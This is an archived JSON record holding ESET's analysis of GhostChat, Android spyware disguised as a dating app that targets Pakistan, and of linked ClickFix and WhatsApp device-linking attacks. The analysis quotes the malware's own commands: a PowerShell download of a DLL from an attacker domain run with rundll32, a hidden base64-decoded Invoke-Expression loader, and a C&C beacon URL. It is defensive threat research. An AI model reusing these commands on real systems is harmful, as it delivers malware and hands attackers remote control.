{ "id": "12025651-9812-4d9d-a4d8-baab60c70413", "created_at": "2026-04-06T00:11:21.526995Z", "updated_at": "2026-04-10T03:37:54.306329Z", "deleted_at": null, "sha1_hash": "95eaf05dc912d34a0e8947c140919754aad402f2", "title": "Love? Actually: Fake dating app used as lure in targeted spyware campaign in Pakistan", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2431403, "plain_text": "Love? Actually: Fake dating app used as lure in targeted spyware\r\ncampaign in Pakistan\r\nBy Lukas Stefanko\r\nArchived: 2026-04-02 12:33:55 UTC\r\nESET researchers have uncovered an Android spyware campaign leveraging romance scam tactics to target\r\nindividuals in Pakistan. The campaign uses a malicious app posing as a chat platform that allows users to initiate\r\nconversations with specific “girls” – fake profiles probably operated via WhatsApp. Underneath the romance\r\ncharade, the real purpose of the malicious app, which we named GhostChat, is exfiltration of the victim’s data –\r\nboth upon first execution and continually while the app is installed on the device. The campaign employs a layer\r\nof deception that we have not previously seen in similar schemes – the fake female profiles in GhostChat are\r\npresented to potential victims as locked, with passcodes required to access them. However, as the codes are\r\nhardcoded in the app, this is just a social engineering tactic likely aimed to create the impression of “exclusive\r\naccess” for the potential victims. While we don’t know how the malicious app is distributed, we assume that this\r\nexclusivity tactic is used as part of the lure, with the purported access codes distributed along with the app.\r\nFurther investigation revealed that the same threat actor appears to be running a broader spy operation – including\r\na ClickFix attack leading to the compromise of victims’ computers, and a WhatsApp device-linking attack gaining\r\naccess to victims’ WhatsApp accounts – thus expanding the scope of surveillance. These related attacks used\r\nwebsites impersonating Pakistani governmental organizations as lures.\r\nGhostChat, detected by ESET as Android/Spy.GhostChat.A, has never been available on Google Play. As an App\r\nDefense Alliance partner, we shared our findings with Google. Android users are automatically protected against\r\nknown versions of this spyware by Google Play Protect, which is enabled by default on Android devices with\r\nGoogle Play Services.\r\nKey points of this blogpost:\r\nESET researchers uncovered an Android spyware campaign that uses romance scam tactics to\r\ntarget individuals in Pakistan.\r\nGhostChat, the malicious app used in the campaign, poses as a dating chat platform with\r\nseemingly locked female profiles. However, since the access codes are hardcoded in the app, this\r\nis just a trick to create the impression of exclusive access.\r\nOnce installed, the GhostChat spyware enables covert surveillance, allowing the threat actor to\r\nmonitor device activity and exfiltrate sensitive data.\r\nOur investigation revealed further activities conducted by the same threat actor: an attack\r\ninvolving ClickFix, which tricks users into executing malicious code on their computers; and a\r\nWhatsApp attack that exploits the app’s link-to-device feature to access victims’ personal\r\nmessages.\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 1 of 14\n\nOverview\r\nOn September 11\r\nth\r\n, 2025, a suspicious Android application was uploaded to VirusTotal from Pakistan. Our\r\nanalysis revealed that while the app uses the icon of a legitimate dating app, it lacks the original app’s\r\nfunctionality and instead serves as a lure – and tool – for mobile espionage.\r\nThe malicious app, which we named GhostChat, has never been available on Google Play, and it required manual\r\ninstallation by users who had to enable permissions for installing apps from unknown sources. Once the app is\r\ninstalled, its operators can monitor, and exfiltrate sensitive data from, the victim’s device.\r\nAlthough the campaign appears to be focused on Pakistan, we currently lack sufficient evidence to attribute it to a\r\nspecific threat actor.\r\nAttack flow\r\nAs illustrated in Figure 1, the attack begins with the distribution of GhostChat – a malicious Android app (package\r\nname com.datingbatch.chatapp) disguised to appear as a legitimate chat platform called Dating Apps without\r\npayment; this legitimate app is available on Google Play and is unrelated to GhostChat other than through the\r\nlatter using its icon. Ghostchat’s source and mode of distribution remain unknown.\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 2 of 14\n\nFigure 1. GhostChat attack flow\r\nUpon execution, GhostChat requests several permissions, as seen in Figure 2. After the permissions are granted,\r\nthe app presents the user with a login screen. In order to proceed, victims must enter login credentials, as shown in\r\nFigure 3.\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 3 of 14\n\nFigure 2. GhostChat requests several permissions upon execution\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 4 of 14\n\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 5 of 14\n\nFigure 3. GhostChat’s login screen\r\nContrary to how a legitimate verification would normally work, the credentials are hardcoded in the application\r\ncode, as seen in Figure 4, and are not processed by any server. This implies that both the app and the credentials\r\nare distributed together, probably by the threat actor.\r\nFigure 4. Hardcoded credentials in the app’s code (username: chat; password: 12345)\r\nOnce logged in, victims are presented with a selection of 14 female profiles, each featuring a photo, name, and\r\nage. All profiles are marked as Locked, and tapping on one of them prompts the victim to enter an unlock code, as\r\nseen in Figure 5.\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 6 of 14\n\nFigure 5. Chatting requires an unlock code\r\nThese codes are also hardcoded and not validated remotely, suggesting that they are probably preshared with the\r\nvictim. Each profile is linked to a specific WhatsApp number with a Pakistani (+92) country code. The numbers\r\nare embedded in the app, as seen in Figure 6, and cannot be changed remotely. This suggests that the operator\r\neither owns multiple Pakistani SIM cards or has access to a third-party provider who sells them. The use of local\r\nnumbers reinforces the illusion that the profiles are real individuals based in Pakistan, increasing the credibility of\r\nthe scam.\r\nUpon entering the correct code, the app redirects the user to WhatsApp to initiate a conversation with the assigned\r\nnumber – presumably operated by the threat actor.\r\nFigure 6. WhatsApp numbers, names, ages, and codes linked to each profile\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 7 of 14\n\nWhile the victim engages with the app, even before logging in, the GhostChat spyware runs in the background and\r\nsilently monitors device activity and exfiltrates sensitive data to a C\u0026C server; see Figure 7.\r\nFigure 7. File exfiltration to C\u0026C server (in the green outline)\r\nBeyond initial exfiltration, GhostChat engages in active espionage: it sets up a content observer to monitor newly\r\ncreated images and uploads them as they appear. Additionally, it schedules a periodic task that scans for new\r\ndocuments every five minutes, ensuring continual surveillance and data harvesting.\r\nThe initial data exfiltration includes the device ID, contact list in the form of a .txt file (uploaded to the C\u0026C\r\nserver from the app’s cache), and files stored on the device (images, PDFs, Word, Excel, PowerPoint files, and\r\nOpen XML file formats).\r\nDuring our investigation, we identified related activities and discovered a connection: a DLL file, as illustrated in\r\nFigure 8.\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 8 of 14\n\nFigure 8. Overview of the related activities revealed by the investigation\r\nFurther analysis of the C\u0026C server used by GhostChat revealed three additional files communicating with the\r\nsame server, which were uploaded to VirusTotal; see Figure 9. These include two batch scripts and one DLL file.\r\nFigure 9. Malicious files communicating with the same C\u0026C server\r\nThe batch files were designed to download and execute a DLL payload from the URL\r\nhttps://hitpak.org/notepad2[.]dll. At the time of analysis, the DLL was no longer available on the server, but the\r\nintent was clearly to deliver and run malicious code on the victim’s machine. Below is a snippet of the script:\r\necho powershell -Command \"Invoke-WebRequest -Uri 'https://hitpak[.]org/notepad2.dll' -OutFile\r\n'%TEMP%\\notepad2.dll'\"\r\necho timeout /t 10\r\necho rundll32.exe \"%TEMP%\\notepad2.dll\",notepad\r\nClickFix attack\r\nThe third file – a DLL file hosted at https://foxy580.github[.]io/koko/file.dll – served as the payload in a separate\r\nClickFix-based attack. ClickFix is a social engineering technique that tricks users into manually executing\r\nmalicious code on their devices by following seemingly legitimate instructions. ClickFix relies on user interaction\r\n– often through deceptive websites or fake alerts – to guide victims into downloading and running malicious\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 9 of 14\n\nscripts. This attack used a fake website impersonating Pakistan’s Computer Emergency Response Team\r\n(PKCERT), located at https://buildthenations[.]info/PKCERT/pkcert.html, as shown in Figure 10.\r\nFigure 10. Deceptive website impersonating Pakistan’s Computer Emergency Response Team\r\nThe site displayed a fabricated security warning allegedly affecting national infrastructure and government\r\nnetworks, urging users to click an Update button. This action triggered ClickFix instructions, as seen in Figure 11,\r\nwhich led to the download and execution of the malicious DLL. The campaign was publicly identified by a self-described security researcher __0XYC__ on X.\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 10 of 14\n\nFigure 11. ClickFix instructions (source:\r\nhttps://x.com/__0XYC__/status/1972166420403572852/photo/1)\r\nFile.dll\r\nThe DLL payload used in the ClickFix campaign exhibits classic C\u0026C behavior with a focus on remote code\r\nexecution. Once loaded, the DLL initiates communication with its C\u0026C server by sending the compromised\r\nmachine’s username and computer name to:\r\nhttps://hitpak[.]org/page.php?tynor=\u003cComputerName\u003esss\u003cUsername\u003e\r\nIf the DLL fails to retrieve either the username or computer name, it substitutes them with default placeholders –\r\nUnUsr probably for unknown user and UPC for unknown PC – ensuring the request still reaches the server.\r\nFollowing this initial handshake, the DLL enters an infinite loop, making requests to the C\u0026C server every five\r\nminutes, awaiting instructions. The server responds with a base64-encoded PowerShell command, which the DLL\r\nexecutes using the following method:\r\npowershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"\r\n[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('\u003cdata_from_C\u0026C\u003e')) | Invoke-Expression\"\r\nThis approach allows the operator to execute arbitrary PowerShell commands on the victim’s machine without\r\ntriggering visible alerts, leveraging PowerShell’s flexibility and stealth capabilities.\r\nAt the time of analysis, the C\u0026C server did not respond with any PowerShell payloads, suggesting either a\r\ndormant stage of the campaign or that the server was awaiting specific victim identifiers before issuing\r\ncommands.\r\nWhatsApp-linking attack\r\nIn addition to desktop targeting in the ClickFix attack, the domain buildthenations[.]info was used in a mobile-focused operation aimed at WhatsApp users. Victims were lured into joining a supposed community – posing as a\r\nchannel of the Pakistan Ministry of Defence (Figure 12) – by scanning a QR code to link their Android or iPhone\r\ndevice to WhatsApp Web or Desktop.\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 11 of 14\n\nFigure 12. Lure to link mobile device to threat actor’s WhatsApp\r\nKnown as GhostPairing, this technique allows an adversary to gain access to the victim’s chat history and\r\ncontacts, acquiring the same level of visibility and control over the account as the owner, effectively\r\ncompromising their private communications. This is not the first time we have seen threat actors trying to hijack\r\nvictims’ messaging accounts. In 2023 China-aligned APT group GREF used BadBazaar Android malware to\r\nsecretly autolink victims’ Signal accounts to the attacker’s device, which allowed the threat actor to spy on their\r\nvictims’ Signal communications.\r\nAfter scanning the QR code presented by the fake Ministry of Defence website, the victim will observe, as\r\nexpected, that a new device had been linked to their WhatsApp accounts. After some time, WhatsApp also sends\r\nnotifications to victims, alerting them that a new device had been linked to their accounts, as seen in Figure 13.\r\nFigure 13. Within two hours, WhatsApp sent a notification informing the user that their account had\r\nbeen linked to another device\r\nTaken together, these findings suggest a coordinated, multiplatform campaign that blends social engineering,\r\nmalware delivery, and espionage across both mobile and desktop environments.\r\nConclusion\r\nThis investigation reveals a highly targeted and multifaceted espionage campaign aimed at users in Pakistan. At its\r\ncore is a malicious Android application disguised as a chat app, which employs a novel romance scam tactic\r\nrequiring credentials and unlock codes to initiate communication – a level of effort and personalization not\r\ncommonly seen in mobile threats.\r\nOnce installed, the app silently exfiltrates sensitive data and actively monitors the device for new content,\r\nconfirming its role as a mobile surveillance tool. The campaign is also connected to broader infrastructure\r\ninvolving ClickFix-based malware delivery and WhatsApp account hijacking techniques. These operations\r\nleverage fake websites, impersonation of national authorities, and deceptive, QR-code-based device linking to\r\ncompromise both desktop and mobile platforms.\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 12 of 14\n\nFor any inquiries about our research published on WeLiveSecurity, please contact us at\r\nthreatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this\r\nservice, visit the ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 Filename Detection Description\r\nB15B1F3F2227EBA4B69C\r\n85BDB638DF34B9D30B6A\r\nLive Chat.apk Android/Spy.GhostChat.A\r\nAndroid GhostChat\r\nspyware.\r\n8B103D0AA37E5297143E\r\n21949471FD4F6B2ECBAA\r\nfile.dll Win64/Agent.HEM\r\nWindows payload that\r\nexecutes PowerShell\r\ncommands from the\r\nC\u0026C.\r\nNetwork\r\nIP Domain Hosting provider First seen Details\r\n188.114.96[.]10 hitpak[.]org Cloudflare, Inc. 2024‑12‑16 Distribution and C\u0026C server.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 17 of the MITRE ATT\u0026CK mobile techniques.\r\nTactic ID Name Description\r\nPersistence\r\nT1398\r\nBoot or Logon\r\nInitialization Scripts\r\nGhostChat receives the BOOT_COMPLETED\r\nbroadcast intent to activate at device startup.\r\nT1541 Foreground Persistence\r\nGhostChat uses foreground persistence to keep\r\na service running.\r\nDiscovery T1426\r\nSystem Information\r\nDiscovery\r\nGhostChat can extract the device ID.\r\nCollection\r\nT1533\r\nData from Local\r\nSystem\r\nGhostChat can exfiltrate files from a device.\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 13 of 14\n\nTactic ID Name Description\r\nT1636.003\r\nProtected User Data:\r\nContact List\r\nGhostChat can extract the device’s contact list.\r\nCommand and\r\nControl\r\nT1437.001\r\nApplication Layer\r\nProtocol: Web\r\nProtocols\r\nGhostChat can communicate with the C\u0026C\r\nusing HTTPS requests.\r\nExfiltration T1646\r\nExfiltration Over C2\r\nChannel\r\nGhostChat exfiltrates data using HTTPS.\r\nThis table was built using version 17 of the MITRE ATT\u0026CK enterprise techniques.\r\nTactic ID Name Description\r\nExecution T1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nWindows agent can execute PowerShell\r\ncommands received from the C\u0026C server.\r\nDiscovery\r\nT1082\r\nSystem Information\r\nDiscovery\r\nWindows agent collects the computer\r\nname.\r\nT1033\r\nSystem Owner/User\r\nDiscovery\r\nWindows agent collects the username.\r\nCommand and\r\nControl\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web Protocols\r\nWindows agent can communicate with the\r\nC\u0026C using HTTPS requests.\r\nT1132.001\r\nData Encoding: Standard\r\nEncoding\r\nWindows agent receives base64 encoded\r\nPowerShell commands to execute.\r\nSource: https://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/" ], "report_names": [ "love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan" ], "threat_actors": [ { "id": "0a03e7f0-2f75-4153-9c4f-c46d12d3962e", "created_at": "2022-10-25T15:50:23.453824Z", "updated_at": "2026-04-10T02:00:05.28793Z", "deleted_at": null, "main_name": "Ke3chang", "aliases": [ "Ke3chang", "APT15", "Vixen Panda", "GREF", "Playful Dragon", "RoyalAPT", "Nylon Typhoon" ], "source_name": "MITRE:Ke3chang", "tools": [ "Okrum", "Systeminfo", "netstat", "spwebmember", "Mimikatz", "Tasklist", "MirageFox", "Neoichor", "ipconfig" ], "source_id": "MITRE", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "adfbe698-24b2-41fc-a701-781fef330b16", "created_at": "2024-01-09T02:00:04.17648Z", "updated_at": "2026-04-10T02:00:03.504826Z", "deleted_at": null, "main_name": "GREF", "aliases": [], "source_name": "MISPGALAXY:GREF", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "17b1b76b-16da-4c4f-8b32-f6fede3eda8c", "created_at": "2022-10-25T16:07:23.750796Z", "updated_at": "2026-04-10T02:00:04.736762Z", "deleted_at": null, "main_name": "Ke3chang", "aliases": [ "APT 15", "BackdoorDiplomacy", "Bronze Davenport", "Bronze Idlewood", "Bronze Palace", "CTG-9246", "G0004", "G0135", "GREF", "Ke3chang", "Metushy", "Nylon Typhoon", "Operation Ke3chang", "Operation MirageFox", "Playful Dragon", "Playful Taurus", "PurpleHaze", "Red Vulture", "Royal APT", "Social Network Team", "Vixen Panda" ], "source_name": "ETDA:Ke3chang", "tools": [ "Agentemis", "Anserin", "BS2005", "BleDoor", "CarbonSteal", "Cobalt Strike", "CobaltStrike", "DarthPusher", "DoubleAgent", "EternalBlue", "GoldenEagle", "Graphican", "HenBox", "HighNoon", "IRAFAU", "Ketrican", "Ketrum", "LOLBAS", "LOLBins", "Living off the Land", "MS Exchange Tool", "Mebroot", "Mimikatz", "MirageFox", "NBTscan", "Okrum", "PluginPhantom", "PortQry", "ProcDump", "PsList", "Quarian", "RbDoor", "RibDoor", "Royal DNS", "RoyalCli", "RoyalDNS", "SAMRID", "SMBTouch", "SilkBean", "Sinowal", "SpyWaller", "Theola", "TidePool", "Torpig", "Turian", "Winnti", "XSLCmd", "cobeacon", "nbtscan", "netcat", "spwebmember" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434281, "ts_updated_at": 1775792274, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/95eaf05dc912d34a0e8947c140919754aad402f2.pdf", "text": "https://archive.orkl.eu/95eaf05dc912d34a0e8947c140919754aad402f2.txt", "img": "https://archive.orkl.eu/95eaf05dc912d34a0e8947c140919754aad402f2.jpg" } }